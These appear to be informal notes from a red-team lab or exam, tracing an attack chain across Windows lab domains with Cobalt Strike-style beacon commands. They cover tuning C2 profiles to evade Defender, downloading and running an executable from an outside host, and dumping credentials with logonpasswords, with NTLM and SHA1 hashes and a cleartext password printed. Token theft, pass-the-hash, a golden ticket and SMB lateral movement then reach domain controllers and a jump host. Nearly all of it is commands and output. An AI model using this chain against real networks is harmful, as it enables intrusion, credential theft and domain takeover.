okay first thing i did was switch up the C2 profiles following the methodology in the defense evasion section!
keep modifying until i can run an exe without having defender flag it! i ended up changing all variables 'x' to 'kri'

now log in as Admin using Passw0rd! and download the exe from www.bleepincomputer.com/update.exe
place into Program Files then run!

now we have our connect as SYSTEM on DUB-WKSTN-2

logonpasswords got us etate
User Name         : etate
Domain            : DUBLIN
Logon Server      : DUB-DC-1
Logon Time        : 13/05/2026 19:34:09
SID               : S-1-5-21-2958544638-1589230383-838459903-3601
	msv :	
	 [00000003] Primary
	 * Username : etate
	 * Domain   : DUBLIN
	 * NTLM     : f4da116176df371cafa28d8064de9c2e
	 * SHA1     : c95c2b652c9e3fb2d4370638b4a8d083b9dd8759
    
stole his token for PID 9672
then run "jump scshell64 DUB-WKSTN-1 smb"
this gets us SYSTEM on DUB-WKSTN-1

logonpasswords got us tdobson
User Name         : tdobson
Domain            : DUBLIN
Logon Server      : DUB-DC-1
Logon Time        : 13/05/2026 16:55:44
SID               : S-1-5-21-2958544638-1589230383-838459903-3102
	msv :	
	 [00000003] Primary
	 * Username : tdobson
	 * Domain   : DUBLIN
	 * NTLM     : 4a0f9bc164edc4aab545196cce6d7c9d
	 * SHA1     : 27e227423cad68e99a36abecabf1a7acebd7fa91
    
dumping password reveals default password as hfu2A!P!NEnyHeQ*
beacon> make_token DUBLIN\tdobson hfu2A!P!NEnyHeQ*
beacon> jump scshell64 dub-web-1 smb
and we got SYSTEM on dub-web-1!

beacon> pth DUBLIN\nwallace eb06f0f9e93c9acb12a50fdfeedefc18
beacon> jump scshell64 dub-dc-1 smb

beacon> make_token CONTOSO\Administrator FakePass
beacon> kerberos_ticket_use C:\Users\Attacker\Desktop\golden_admin.kirbi
beacon> ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
beacon> jump scshell64 LON-DC-1 smb

and we got system!

krb_asktgs /service:ldap/enc-dc-1.contoso.enclave /targetdomain:contoso.enclave /dc:enc-dc-1.contoso.enclave /ticket:

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

bloodhound - Passw0rd!@!!
enc-fs-1 S-1-5-21-1330904164-3792538338-293942156
enclave acces S-1-5-21-1076548718-1118529210-2193484809-2601

lets check the GPO for enclave access
0FF094F9-69ED-476D-8DCB-1820DE60A666
*S-1-5-21-1330904164-3792538338-293942156-2103__Memberof = *S-1-5-32-544
okay so admin over JMP OU?

[05/14 12:41:27] beacon> jump scshell64 enc-jmp-1.contoso.enclave smb
we SYSTEM on jmp lets see what we can do

